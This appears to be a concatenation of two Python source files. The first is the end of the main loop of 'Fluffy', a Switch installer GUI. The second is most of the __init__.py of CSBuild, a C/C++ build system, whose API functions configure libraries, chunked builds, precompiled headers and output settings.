set_dark_mode(1)
dark_check.setChecked(False)
pass
else:
set_dark_mode(1)
dark_check.setChecked(False)
# Main loop
while True:
if last_error != "NA":
msg_box = QMessageBox.critical(window, 'Error', last_error, QMessageBox.Ok)
reset_last_error()
reset_install()
if is_logging:
if os.path.isfile(initial_dir + '/fluffy.log'):
if os.path.getsize(initial_dir + '/fluffy.log') > 250000:
logging.debug("Fluffy Log: Logging size reached, turning off logging.")
turn_off_logging()
if os.path.isfile('fluffy.log'):
if os.path.getsize('fluffy.log') > 250000:
logging.debug("Fluffy Log: Logging size reached, turning off logging.")
turn_off_logging()
QApplication.processEvents()
if not window.isVisible():
try:
switch_ip = txt_ip.text()
except:
pass
close_program()
pid = os.getpid()
os.kill(pid, signal.SIGTERM)
if is_exiting:
pid = os.getpid()
os.kill(pid, signal.SIGTERM)
if not sent_header and not is_installing and is_network:
l_switch.setText(Language.CurrentDict[12])
l_switch.setStyleSheet(BLUE)
if list_nsp.count() > 0:
btn_header.setEnabled(True)
else:
btn_header.setEnabled(False)
if not is_installing and not is_network and usb_success and not sent_header:
set_switch_text()
# Tinfoil Network Mode
if sent_header and is_network:
try:
if is_done:
set_done_text()
else:
if is_installing:
set_progress_text()
else:
l_status.setText(Language.CurrentDict[25])
l_switch.setText(Language.CurrentDict[15])
l_switch.setStyleSheet(PURPLE)
except:
pass
if sent_header and not is_installing and not is_done:
btn_header.setEnabled(True)
btn_header.setText(Language.CurrentDict[16])
if sent_header and is_installing and not is_done:
btn_header.setEnabled(False)
# Goldleaf & Tinfoil USB Mode
if sent_header and not is_network:
try:
if is_done:
set_done_text()
else:
if is_installing:
set_progress_text()
else:
set_loading_text()
except:
pass
except Exception as e:
if is_logging:
logging.error(e, exc_info=True)
close_program()
pid = os.getpid()
os.kill(pid, signal.SIGTERM)
|
__init__.py
|
# Copyright (C) 2013 Jaedyn K. Draper
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
.. module:: CSBuild
:synopsis: cross-platform c/c++ build system
.. moduleauthor:: Jaedyn K. Draper, Brandon M. Bare
.. attention:: To support CSBuild's operation, Python's import lock is DISABLED once CSBuild has started.
This should not be a problem for most makefiles, but if you do any threading within your makefile, take note:
anything that's imported and used by those threads should always be implemented on the main thread before that
thread's execution starts. Otherwise, CSBuild does not guarantee that the import will have completed
once that thread tries to use it. Long story short: Don't import modules within threads.
"""
import argparse
import glob
import shlex
import shutil
import signal
import math
import subprocess
import os
import sys
import threading
import time
import platform
import imp
import re
import traceback
import copy
if sys.version_info >= (3,0):
import io
StringIO = io.StringIO
else:
import cStringIO
StringIO = cStringIO.StringIO
from . import plugin_plist_generator
if sys.version_info < (3,0):
import cPickle as pickle
else:
import pickle
class ProjectType( object ):
"""
Specifies the type of project to compile
"""
Application = 0
SharedLibrary = 1
StaticLibrary = 2
LoadableModule = 3 # Only matters for Apple platforms; every other platform will interpret this as SharedLibrary.
class DebugLevel( object ):
Disabled = 0
EmbeddedSymbols = 1
ExternalSymbols = 2
ExternalSymbolsPlus = 3
class OptimizationLevel( object ):
Disabled = 0
Size = 1
Speed = 2
Max = 3
class ScopeDef( object ):
Self = 1
Intermediate = 2
Final = 4
DependentsOnly = Intermediate | Final
All = Self | Intermediate | Final
class StaticLinkMode( object ):
LinkLibs = 0
LinkIntermediateObjects = 1
class RunMode( object ):
Normal = 0
Help = 1
GenerateSolution = 2
Qualop = 3
from . import _utils
from . import toolchain
from . import toolchain_msvc
from . import toolchain_gcc
from . import toolchain_gcc_darwin
from . import toolchain_android
from . import toolchain_ios
from . import log
from . import _shared_globals
from . import projectSettings
from . import project_generator_qtcreator
from . import project_generator_slickedit
from . import project_generator_visual_studio_v2
from . import project_generator
from . import plugin
try:
from .proprietary import toolchain_ps4
from .proprietary import toolchain_wiiu
except:
pass
__author__ = "Jaedyn K. Draper, Brandon M. Bare"
__copyright__ = 'Copyright (C) 2012-2014 Jaedyn K. Draper'
__credits__ = ["Jaedyn K. Draper", "Brandon M. Bare", "Jeff Grills", "Randy Culley"]
__license__ = 'MIT'
__maintainer__ = "Jaedyn K. Draper"
__email__ = "jaedyn.csbuild-contact@jaedyn.co"
__status__ = "Development"
with open( os.path.dirname( __file__ ) + "/version", "r" ) as f:
__version__ = f.read( )
def _exitsig(sig, frame):
if sig == signal.SIGINT:
log.LOG_ERROR( "Keyboard interrupt received. Aborting build." )
else:
log.LOG_ERROR( "Received terminate signal. Aborting build." )
Exit(sig)
signal.signal( signal.SIGINT, _exitsig )
signal.signal( signal.SIGTERM, _exitsig )
# Csbuild is in Normal run mode by default.
_runMode = RunMode.Normal
def NoBuiltInTargets( ):
"""
Disable the built-in "debug" and "release" targets.
"""
	if SetupDebugTarget in projectSettings.currentProject.targets["debug"]:
		projectSettings.currentProject.targets["debug"].remove( SetupDebugTarget )
	if SetupReleaseTarget in projectSettings.currentProject.targets["release"]:
		projectSettings.currentProject.targets["release"].remove( SetupReleaseTarget )
def EnableOutputInstall( ):
"""
Enables installation of the compiled output file.
The default installation directory is /usr/local/lib.
"""
projectSettings.currentProject.SetValue("installOutput", True)
def EnableHeaderInstall( ):
"""
Enables installation of the project's headers.
Default target is /usr/local/include, unless the --prefix option is specified.
	If --prefix is specified, the target will be {prefix}/include
"""
projectSettings.currentProject.SetValue("installHeaders", True)
def SetHeaderInstallSubdirectory( s ):
"""
	Specifies a subdirectory of {prefix}/include in which to install the headers.
:type s: str
:param s: The desired subdirectory; i.e., if you specify this as "myLib", the headers will be
	installed under {prefix}/include/myLib.
"""
projectSettings.currentProject.SetValue( "headerInstallSubdir", s)
def AddExcludeDirectories( *args ):
"""
Exclude the given directories from the project. This may be called multiple times to add additional excludes.
Directories are relative to the location of the script itself, not the specified project working directory.
:type args: an arbitrary number of strings
:param args: The list of directories to be excluded.
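	Example (the directory names shown are purely illustrative):
	csbuild.AddExcludeDirectories( "ThirdParty/tests", "Source/experimental" )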
"""
args = list( args )
newargs = []
for arg in args:
arg = _utils.FixupRelativePath( arg )
arg = _utils.PathWorkingDirPair( arg )
newargs.append( arg )
projectSettings.currentProject.ExtendList( "excludeDirsTemp", newargs )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def AddExcludeFiles( *args ):
"""
Exclude the given files from the project. This may be called multiple times to add additional excludes.
Files are relative to the location of the script itself, not the specified project working directory.
:type args: an arbitrary number of strings
:param args: The list of files to be excluded.
"""
args = list( args )
newargs = []
for arg in args:
arg = _utils.FixupRelativePath( arg )
arg = _utils.PathWorkingDirPair( arg )
newargs.append( arg )
projectSettings.currentProject.ExtendList( "excludeFilesTemp", newargs )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def AddLibraries( *args ):
"""
When linking the project, link in the given libraries. This may be called multiple times to add additional libraries.
	In the gcc toolchain, these will all be prefixed with "lib" when looking for the file to link. I.e.,
	csbuild.AddLibraries("MyLib") will link libMyLib.so or libMyLib.a.
	For compatibility, the msvc toolchain will search for the library exactly as specified, and if it can't find it,
	will then search for it with the lib prefix. I.e., csbuild.AddLibraries("MyLib") will first search for MyLib.lib,
	and if that isn't found, will then search for libMyLib.lib.
:type args: an arbitrary number of strings
:param args: The list of libraries to link in.
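	Example (the library names shown are purely illustrative):
	csbuild.AddLibraries( "m", "pthread" )
	With the gcc toolchain this links libm and libpthread; with msvc it searches for m.lib/pthread.lib first.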
"""
projectSettings.currentProject.UnionSet("libraries", _utils.OrderedSet( args ))
def AddStaticLibraries( *args ):
"""
	Similar to csbuild.AddLibraries, but forces these libraries to be linked statically.
:type args: an arbitrary number of strings
:param args: The list of libraries to link in.
"""
projectSettings.currentProject.UnionSet("staticLibraries", _utils.OrderedSet( args ))
def AddSharedLibraries( *args ):
"""
	Similar to csbuild.AddLibraries, but forces these libraries to be linked dynamically.
:type args: an arbitrary number of strings
:param args: The list of libraries to link in.
"""
projectSettings.currentProject.UnionSet("sharedLibraries", _utils.OrderedSet( args ))
def AddFrameworks( *args ):
"""
Add frameworks for Objective-C/C++ compilations.
:type args: an arbitrary number of strings
	:param args: The list of frameworks to link in.
"""
projectSettings.currentProject.UnionSet("frameworks", _utils.OrderedSet( args ))
def AddIncludeDirectories( *args ):
"""
Search the given directories for include headers. This may be called multiple times to add additional directories.
Directories are relative to the location of the script itself, not the specified project working directory.
In the gcc toolchain, /usr/include and /usr/local/include (or the platform appropriate equivalents) will always
be appended to the end of this list.
:type args: an arbitrary number of strings
:param args: The list of directories to be searched.
"""
newArgs = []
for arg in args:
arg = _utils.FixupRelativePath( arg )
arg = _utils.PathWorkingDirPair( arg )
newArgs.append( arg )
projectSettings.currentProject.ExtendList( "includeDirsTemp", newArgs )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def AddLibraryDirectories( *args ):
"""
Search the given directories for libraries to link. This may be called multiple times to add additional directories.
Directories are relative to the location of the script itself, not the specified project working directory.
In the gcc toolchain, /usr/lib and /usr/local/lib (or the platform appropriate equivalents) will always
be appended to the end of this list.
:type args: an arbitrary number of strings
:param args: The list of directories to be searched.
"""
newArgs = []
for arg in args:
arg = _utils.FixupRelativePath( arg )
arg = _utils.PathWorkingDirPair( arg )
newArgs.append( arg )
projectSettings.currentProject.ExtendList( "libraryDirsTemp", newArgs )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def AddFrameworkDirectories( *args ):
"""
	Search the given directories for frameworks to link. This may be called multiple times to add additional directories.
Directories are relative to the location of the script itself, not the specified project working directory.
:type args: an arbitrary number of strings
:param args: The list of directories to be searched.
"""
newArgs = []
for arg in args:
arg = _utils.FixupRelativePath( arg )
arg = _utils.PathWorkingDirPair( arg )
newArgs.append( arg )
projectSettings.currentProject.ExtendList( "frameworkDirsTemp", newArgs )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def AddAppleStoryboardFiles( *args ):
"""
DEPRECATED - This will be removed when tool plugins are able to register file extensions.
Add a list of storyboard files to be compiled. Only applies to builds for Apple platforms.
:param args: List of storyboard files.
	:type args: An arbitrary number of strings.
"""
projectSettings.currentProject.UnionSet( "storyboardFiles", _utils.OrderedSet( args ) )
def AddAppleInterfaceFiles( *args ):
"""
DEPRECATED - This will be removed when tool plugins are able to register file extensions.
Add a list of interface files to be compiled. Only applies to builds for Apple platforms.
:param args: List of interface files.
	:type args: An arbitrary number of strings.
"""
projectSettings.currentProject.UnionSet( "interfaceFiles", _utils.OrderedSet( args ) )
def AddAppleAssetCatalogs( *args ):
"""
DEPRECATED - This will be removed when tool plugins are able to register file extensions.
Add a list of asset catalogs to be compiled. Only applies to builds for Apple platforms.
:param args: List of asset catalogs.
	:type args: An arbitrary number of strings.
"""
projectSettings.currentProject.UnionSet( "assetCatalogs", _utils.OrderedSet( args ) )
def ClearLibraries( ):
"""Clears the list of libraries"""
projectSettings.currentProject.SetValue("libraries", _utils.OrderedSet())
def ClearStaticLibraries( ):
"""Clears the list of statically-linked libraries"""
projectSettings.currentProject.SetValue("staticLibraries", _utils.OrderedSet())
def ClearSharedLibraries( ):
"""Clears the list of dynamically-linked libraries"""
projectSettings.currentProject.SetValue("sharedLibraries", _utils.OrderedSet())
def ClearFrameworks():
"""Clears the list of frameworks."""
projectSettings.currentProject.SetValue( "frameworks", _utils.OrderedSet() )
def ClearIncludeDirectories( ):
"""Clears the include directories"""
projectSettings.currentProject.SetValue( "includeDirsTemp", [] )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def ClearLibraryDirectories( ):
"""Clears the library directories"""
projectSettings.currentProject.SetValue( "libraryDirsTemp", [] )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def ClearFrameworkDirectories():
"""Clears the framework directories."""
projectSettings.currentProject.SetValue( "frameworkDirsTemp", [] )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def ClearAppleStoryboardFiles():
	"""Clears the list of Apple storyboard files."""
	projectSettings.currentProject.SetValue( "storyboardFiles", _utils.OrderedSet() )
def ClearAppleInterfaceFiles():
	"""Clears the list of Apple interface files."""
	projectSettings.currentProject.SetValue( "interfaceFiles", _utils.OrderedSet() )
def ClearAppleAssetCatalogs():
	"""Clears the list of Apple asset catalogs."""
	projectSettings.currentProject.SetValue( "assetCatalogs", _utils.OrderedSet() )
def SetOptimizationLevel( i ):
"""
	Sets the optimization level. Because optimization options differ between toolchains, this should usually be called on a per-toolchain basis.
:type i: OptimizationLevel
:param i: The level of optimization to use
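	Example (a minimal sketch):
	csbuild.SetOptimizationLevel( csbuild.OptimizationLevel.Speed )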
"""
projectSettings.currentProject.SetValue("optLevel", i)
projectSettings.currentProject.SetValue("_optLevel_set", True)
def SetDebugLevel( i ):
"""
	Sets the debug level. Because debug options differ between toolchains, this should usually be called on a per-toolchain basis.
:type i: DebugLevel
:param i: How (and if) symbols should be generated
"""
projectSettings.currentProject.SetValue("debugLevel", i)
projectSettings.currentProject.SetValue("_debugLevel_set", True)
def AddDefines( *args ):
"""
Add additionally defined preprocessor directives, as if each file had a #define directive at the very top.
:type args: an arbitrary number of strings
:param args: The list of preprocessor directives to define
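	Example (the macro names shown are purely illustrative):
	csbuild.AddDefines( "NDEBUG", "MY_FEATURE_ENABLED=1" )
	This behaves as if every file began with "#define NDEBUG" and "#define MY_FEATURE_ENABLED 1".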
"""
projectSettings.currentProject.ExtendList("defines", list( args ))
def ClearDefines( ):
"""Clear the list of defined preprocessor directives"""
projectSettings.currentProject.SetValue("defines", [])
def AddUndefines( *args ):
"""
Add explicitly undefined preprocessor directives, as if each file had a #undef directive at the very top.
:type args: an arbitrary number of strings
:param args: The list of preprocessor directives to undefine
"""
projectSettings.currentProject.ExtendList("undefines", list( args ))
def ClearUndefines( ):
"""Clear the list of undefined preprocessor directives"""
projectSettings.currentProject.SetValue("undefines", [])
def EnableHiddenVisibility():
"""
Enable the use of hidden symbol visibility. Ignored by all but the gcc toolchain (and derived toolchains).
"""
projectSettings.currentProject.SetValue( "useHiddenVisibility", True )
def SetCppStandardLibrary( s ):
"""
The standard C++ library to be used when compiling. Possible values are "libstdc++" and "libc++". Ignored by all but the gcc toolchain (and derived toolchains).
:param s: Library to use.
:type s: str
"""
projectSettings.currentProject.SetValue( "stdLib", s )
def SetCxxCommand( s ):
"""
Specify the compiler executable to be used for compiling C++ files. Ignored by all but the gcc toolchain (and derived toolchains).
:type s: str
:param s: Path to the executable to use for compilation
"""
projectSettings.currentProject.SetValue("cxx", s)
def SetCcCommand( s ):
"""
Specify the compiler executable to be used for compiling C files. Ignored by the msvc toolchain.
:type s: str
:param s: Path to the executable to use for compilation
"""
projectSettings.currentProject.SetValue("cc", s)
def SetOutput( name, projectType = ProjectType.Application ):
"""
Sets the output options for this project.
:type name: str
:param name: The output name. Do not include an extension, and do not include the "lib" prefix for libraries on
Linux. These are added automatically.
:type projectType: csbuild.ProjectType
	:param projectType: The type of project to compile. The options are:
	- ProjectType.Application - on Windows, this will be built with a .exe extension. On Linux, there is no extension.
	- ProjectType.SharedLibrary - on Windows, this will generate a .lib and a .dll.
	On Linux, this will generate a .so and prefix "lib" to the output name.
	- ProjectType.StaticLibrary - on Windows, this will generate a .lib. On Linux, this will generate a .a and prefix
	"lib" to the output name.
	- ProjectType.LoadableModule - only meaningful on Apple platforms; every other platform treats this as SharedLibrary.
"""
projectSettings.currentProject.SetValue("outputName", name)
projectSettings.currentProject.SetValue("type", projectType)
def SetOutputExtension( name ):
"""
This allows you to override the extension used for the output file.
:type name: str
	:param name: The desired extension, including the .; i.e., csbuild.SetOutputExtension( ".exe" )
"""
projectSettings.currentProject.SetValue("ext", name)
def SetOutputDirectory( s ):
"""
Specifies the directory in which to place the output file.
:type s: str
:param s: The output directory, relative to the current script location, NOT to the project working directory.
"""
s = _utils.FixupRelativePath( s )
s = _utils.PathWorkingDirPair( s )
projectSettings.currentProject.SetValue( "outputDirTemp", s )
projectSettings.currentProject.SetValue( "_outputDir_set", True )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def SetIntermediateDirectory( s ):
"""
Specifies the directory in which to place the intermediate .o or .obj files.
:type s: str
:param s: The object directory, relative to the current script location, NOT to the project working directory.
"""
s = _utils.FixupRelativePath( s )
s = _utils.PathWorkingDirPair( s )
projectSettings.currentProject.SetValue( "objDirTemp", s )
projectSettings.currentProject.SetValue( "_objDir_set", True )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def EnableProfiling( ):
"""
Optimize output for profiling
"""
projectSettings.currentProject.SetValue("profile", True)
def DisableProfiling( ):
"""
Turns profiling optimizations back off
"""
projectSettings.currentProject.SetValue("profile", False)
def AddCxxCompilerFlags( *args ):
"""
Specifies a list of literal strings to be passed to the C++ compiler. As this is toolchain-specific, it should be
called on a per-toolchain basis.
:type args: an arbitrary number of strings
:param args: The list of flags to be passed
"""
projectSettings.currentProject.ExtendList("cxxCompilerFlags", list( args ))
def ClearCxxCompilerFlags( ):
"""
Clears the list of literal C++ compiler flags.
"""
projectSettings.currentProject.SetValue("cxxCompilerFlags", [])
def AddCcCompilerFlags( *args ):
"""
Specifies a list of literal strings to be passed to the C compiler. As this is toolchain-specific, it should be
called on a per-toolchain basis.
:type args: an arbitrary number of strings
:param args: The list of flags to be passed
"""
projectSettings.currentProject.ExtendList("ccCompilerFlags", list( args ))
def ClearCcCompilerFlags( ):
"""
Clears the list of literal C compiler flags.
"""
projectSettings.currentProject.SetValue("ccCompilerFlags", [])
def AddCompilerFlags( *args ):
"""
	Specifies a list of literal strings to be passed to both the C compiler and the C++ compiler.
As this is toolchain-specific, it should be called on a per-toolchain basis.
:type args: an arbitrary number of strings
:param args: The list of flags to be passed
"""
AddCcCompilerFlags( *args )
AddCxxCompilerFlags( *args )
def ClearCompilerFlags( ):
"""
Clears the list of literal compiler flags.
"""
ClearCcCompilerFlags( )
ClearCxxCompilerFlags( )
def AddLinkerFlags( *args ):
"""
Specifies a list of literal strings to be passed to the linker. As this is toolchain-specific, it should be
called on a per-toolchain basis.
:type args: an arbitrary number of strings
:param args: The list of flags to be passed
"""
projectSettings.currentProject.ExtendList("linkerFlags", list( args ))
def ClearLinkerFlags( ):
"""
Clears the list of literal linker flags.
"""
projectSettings.currentProject.SetValue("linkerFlags", [])
def DisableChunkedBuild( ):
"""Turn off the chunked/unity build system and build using individual files."""
projectSettings.currentProject.SetValue("useChunks", False)
def EnableChunkedBuild( ):
"""Turn chunked/unity build on and build using larger compilation units. This is the default."""
projectSettings.currentProject.SetValue("useChunks", True)
def StopOnFirstError():
"""
Stop compilation when the first error is encountered.
"""
_shared_globals.stopOnError = True
def SetNumFilesPerChunk( i ):
"""
Set the size of the chunks used in the chunked build. This indicates the number of files per compilation unit.
The default is 10.
	This value is ignored if SetChunks is called.
	Mutually exclusive with SetMaxChunkFileSize().
:type i: int
:param i: Number of files per chunk
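	Example (a minimal sketch):
	csbuild.SetNumFilesPerChunk( 20 )
	Each chunk will then combine up to 20 source files into a single compilation unit.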
"""
projectSettings.currentProject.SetValue("chunkSize", i)
projectSettings.currentProject.SetValue("chunkFilesize", 0)
def SetMaxChunkFileSize( i ):
"""
	Sets the maximum combined filesize for a chunk. The default is 500000 bytes, and filesize-based chunking is the default behavior.
	This value is ignored if SetChunks is called.
	Mutually exclusive with SetNumFilesPerChunk().
	:type i: int
	:param i: Maximum size per chunk in bytes.
	"""
	projectSettings.currentProject.SetValue("chunkFilesize", i)
	projectSettings.currentProject.SetValue("chunkSize", 0)
def SetChunkTolerance( i ):
"""
	Please see detailed description.
	**If building using SetNumFilesPerChunk():**
	Set the number of modified files below which a chunk will be split into individual files.
	For example, if you set this to 3 (the default), then a chunk will be built as a chunk
	if more than three of its files need to be built; if three or fewer need to be built, they will
	be built individually to save build time.
	**If building using SetMaxChunkFileSize():**
	Sets the total combined filesize of modified files within a chunk below which the chunk will be split into
	individual files.
	For example, if you set this to 150000 (the default), then a chunk will be built as a chunk if the total
	filesize of the files needing to be built exceeds 150kb. If less than 150kb worth of data needs to be built,
	the files will be built individually to save time.
	:type i: int
	:param i: Number of modified files (or their combined filesize in bytes) below which a chunk is split into individual files.
"""
if projectSettings.currentProject.chunkFilesize > 0:
projectSettings.currentProject.SetValue("chunkSizeTolerance", i)
elif projectSettings.currentProject.chunkSize > 0:
projectSettings.currentProject.SetValue("chunkTolerance", i)
else:
log.LOG_WARN( "Chunk size and chunk filesize are both zero or negative, cannot set a tolerance." )
def SetChunks( *chunks ):
"""
Explicitly set the chunks used as compilation units.
NOTE that setting this will disable the automatic file gathering, so any files in the project directory that
are not specified here will not be built.
:type chunks: an arbitrary number of lists of strings
	:param chunks: Lists containing filenames of files to be built,
	relative to the script's location, NOT the project working directory. Each list will be built as one chunk.
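	Example (the file names shown are purely illustrative):
	csbuild.SetChunks( [ "Source/audio.cpp", "Source/mixer.cpp" ], [ "Source/render.cpp" ] )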
"""
chunks = list( chunks )
projectSettings.currentProject.SetValue("forceChunks", chunks)
def ClearChunks( ):
"""Clears the explicitly set list of chunks and returns the behavior to the default."""
projectSettings.currentProject.SetValue("forceChunks", [])
def SetHeaderRecursionDepth( i ):
"""
Sets the depth to search for header files. If set to 0, it will search with unlimited recursion to find included
headers. Otherwise, it will travel to a depth of i to check headers. If set to 1, this will only check first-level
headers and not check headers included in other headers; if set to 2, this will check headers included in headers,
but not headers included by *those* headers; etc.
This is very useful if you're using a large library (such as boost) or a very large project and are experiencing
long waits prior to compilation.
:type i: int
:param i: Recursion depth for header examination
"""
projectSettings.currentProject.SetValue("headerRecursionDepth", i)
def IgnoreExternalHeaders( ):
"""
If this option is set, external headers will not be checked or followed when building. Only headers within the
base project's directory and its subdirectories will be checked. This will speed up header checking, but if you
modify any external headers, you will need to manually --clean or --rebuild the project.
"""
projectSettings.currentProject.SetValue("ignoreExternalHeaders", True)
def DisableWarnings( ):
"""
Disables all warnings.
"""
projectSettings.currentProject.SetValue("noWarnings", True)
def SetDefaultTarget( s ):
"""
Sets the default target if none is specified. The default value for this is release.
:type s: str
:param s: Name of the target to build for this project if none is specified.
"""
projectSettings.currentProject.SetValue("defaultTarget", s.lower( ))
def Precompile( *args ):
"""
Explicit list of header files to precompile. Disables chunk precompile when called.
:type args: an arbitrary number of strings
:param args: The files to precompile.
"""
projectSettings.currentProject.SetValue( "precompileTemp", [] )
newArgs = []
for arg in list( args ):
arg = _utils.FixupRelativePath( arg )
arg = _utils.PathWorkingDirPair( arg )
newArgs.append( arg )
projectSettings.currentProject.ExtendList( "precompileTemp", newArgs )
projectSettings.currentProject.SetValue( "chunkedPrecompile", False )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def PrecompileAsC( *args ):
"""
Specifies header files that should be compiled as C headers instead of C++ headers.
:type args: an arbitrary number of strings
:param args: The files to specify as C files.
"""
projectSettings.currentProject.SetValue( "precompileAsCTemp", [] )
newArgs = []
for arg in list( args ):
arg = _utils.FixupRelativePath( arg )
arg = _utils.PathWorkingDirPair( arg )
newArgs.append( arg )
	projectSettings.currentProject.ExtendList( "precompileAsCTemp", newArgs )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def EnableChunkedPrecompile():
"""
When this is enabled, all header files will be precompiled into a single "superheader" and included in all files.
"""
projectSettings.currentProject.SetValue( "chunkedPrecompile", True )
def DisablePrecompile( *args ):
"""
Disables precompilation and handles headers as usual.
:type args: an arbitrary number of strings
:param args: A list of files to disable precompilation for.
If this list is empty, it will disable precompilation entirely.
"""
args = list( args )
if args:
newArgs = []
for arg in args:
arg = _utils.FixupRelativePath( arg )
arg = _utils.PathWorkingDirPair( arg )
newArgs.append( arg )
projectSettings.currentProject.ExtendList( "precompileExcludeFilesTemp", newArgs )
else:
projectSettings.currentProject.SetValue( "chunkedPrecompile", False )
projectSettings.currentProject.SetValue( "precompileTemp", [] )
projectSettings.currentProject.SetValue( "precompileAsCTemp", [] )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def EnableUnityBuild( ):
"""
Turns on true unity builds, combining all files into only one compilation unit.
"""
projectSettings.currentProject.SetValue("unity", True)
def LinkStaticRuntime( ):
"""
Link against a static C/C++ runtime library.
"""
projectSettings.currentProject.SetValue("useStaticRuntime", True)
def LinkSharedRuntime( ):
"""
Link against a dynamic C/C++ runtime library.
"""
projectSettings.currentProject.SetValue("useStaticRuntime", False)
def SetOutputArchitecture( arch ):
"""
Set the output architecture.
:type arch: str
:param arch: The desired architecture. Choose from x86, x64, ARM.
"""
projectSettings.currentProject.SetValue("outputArchitecture", arch)
def AddExtraFiles( *args ):
"""
Adds additional files to be compiled that are not in the project directory.
:type args: an arbitrary number of strings
:param args: A list of files to add.
"""
newArgs = []
for arg in list( args ):
arg = _utils.FixupRelativePath( arg )
arg = _utils.PathWorkingDirPair( arg )
newArgs.append( arg )
projectSettings.currentProject.ExtendList( "extraFilesTemp", newArgs )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def ClearExtraFiles():
"""
Clear the list of external files to compile.
"""
projectSettings.currentProject.SetValue( "extraFilesTemp", [] )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def AddExtraDirectories( *args ):
"""
Adds additional directories to search for files in.
:type args: an arbitrary number of strings
:param args: A list of directories to search.
"""
newArgs = []
for arg in list( args ):
arg = _utils.FixupRelativePath( arg )
arg = _utils.PathWorkingDirPair( arg )
newArgs.append( arg )
projectSettings.currentProject.ExtendList( "extraDirsTemp", newArgs )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def ClearExtraDirectories():
"""
Clear the list of external directories to search.
"""
projectSettings.currentProject.SetValue( "extraDirsTemp", [] )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def AddExtraObjects( *args ):
"""
Adds additional objects to be passed to the linker that are not in the project directory.
:type args: an arbitrary number of strings
:param args: A list of objects to add.
"""
newArgs = []
for arg in list( args ):
arg = _utils.FixupRelativePath( arg )
arg = _utils.PathWorkingDirPair( arg )
newArgs.append( arg )
projectSettings.currentProject.ExtendList( "extraObjsTemp", newArgs )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def ClearExtraObjects():
"""
Clear the list of external objects to link.
"""
projectSettings.currentProject.SetValue( "extraObjsTemp", [] )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def EnableWarningsAsErrors( ):
"""
Promote all warnings to errors.
"""
projectSettings.currentProject.SetValue("warningsAsErrors", True)
def DisableWarningsAsErrors( ):
"""
Disable the promotion of warnings to errors.
"""
projectSettings.currentProject.SetValue("warningsAsErrors", False)
def DoNotChunkTogether(pattern, *additionalPatterns):
"""
Makes files matching the given patterns mutually exclusive for chunking.
I.e., if you call this with DoNotChunkTogether("File1.cpp", "File2.cpp"), it guarantees
File1 and File2 will never appear together in the same chunk. If you specify more than two files,
or a pattern that matches more than two files, no two files in the list will ever appear together.
.. note:
This setting is not eligible for scope inheritance.
:type pattern: string
:param pattern: Pattern to search for files with (i.e., Source/*_Unchunkable.cpp)
:type additionalPatterns: arbitrary number of optional strings
:param additionalPatterns: Additional patterns to compile the list of mutually exclusive files with
"""
patterns = [pattern] + list(additionalPatterns)
mutexFiles = _utils.OrderedSet()
for patternToMatch in patterns:
for filename in glob.glob(patternToMatch):
mutexFiles.add(os.path.abspath(filename))
for file1 in mutexFiles:
for file2 in mutexFiles:
if file1 == file2:
continue
if file1 not in projectSettings.currentProject.chunkMutexes:
projectSettings.currentProject.chunkMutexes[file1] = _utils.OrderedSet({ file2 })
else:
projectSettings.currentProject.chunkMutexes[file1].add(file2)
def DoNotChunk(*files):
"""
	Prevents the listed files (or files matching the listed patterns) from ever being placed
	in a chunk.
:type files: arbitrary number of strings
:param files: filenames or patterns to exclude from chunking
"""
for pattern in list(files):
for filename in glob.glob(pattern):
projectSettings.currentProject.AddToSet("chunkExcludes", os.path.abspath(filename))
def SetStaticLinkMode(mode):
"""
	Determines how static links are handled. With the msvc toolchain, iterative link times of a project with many libraries
	can be significantly improved by setting this to :StaticLinkMode.LinkIntermediateObjects:. This will cause the linker to link
	the .obj files used to make a library directly into the dependent project. Link times for full builds may be slightly slower,
	but this will allow incremental linking to function when libraries are being changed. (Usually, changing a .lib results
	in a full link.)
On most toolchains, this defaults to :StaticLinkMode.LinkLibs:. In debug mode only for the msvc toolchain, this defaults
to :StaticLinkMode.LinkIntermediateObjects:.
:type mode: :StaticLinkMode:
:param mode: The link mode to set
"""
projectSettings.currentProject.SetValue("linkMode", mode)
projectSettings.currentProject.SetValue("linkModeSet", True)
def SetUserData(key, value):
"""
Adds miscellaneous data to a project. This can be used later in a build event or in a format string.
This becomes an attribute on the project's userData member variable. As an example, to set a value:
csbuild.SetUserData("someData", "someValue")
Then to access it later:
project.userData.someData
.. note:
This setting is not eligible for scope inheritance.
:type key: str
:param key: name of the variable to set
:type value: any
:param value: value to set to that variable
"""
projectSettings.currentProject.userData.dataDict[key] = value
def SetApplePropertyList( plistFile ):
"""
Set the property list for a project. This only applies to builds on Apple platforms.
:param plistFile:
:type plistFile: :class:`csbuild.plugin_plist_generator.PListGenerator`
"""
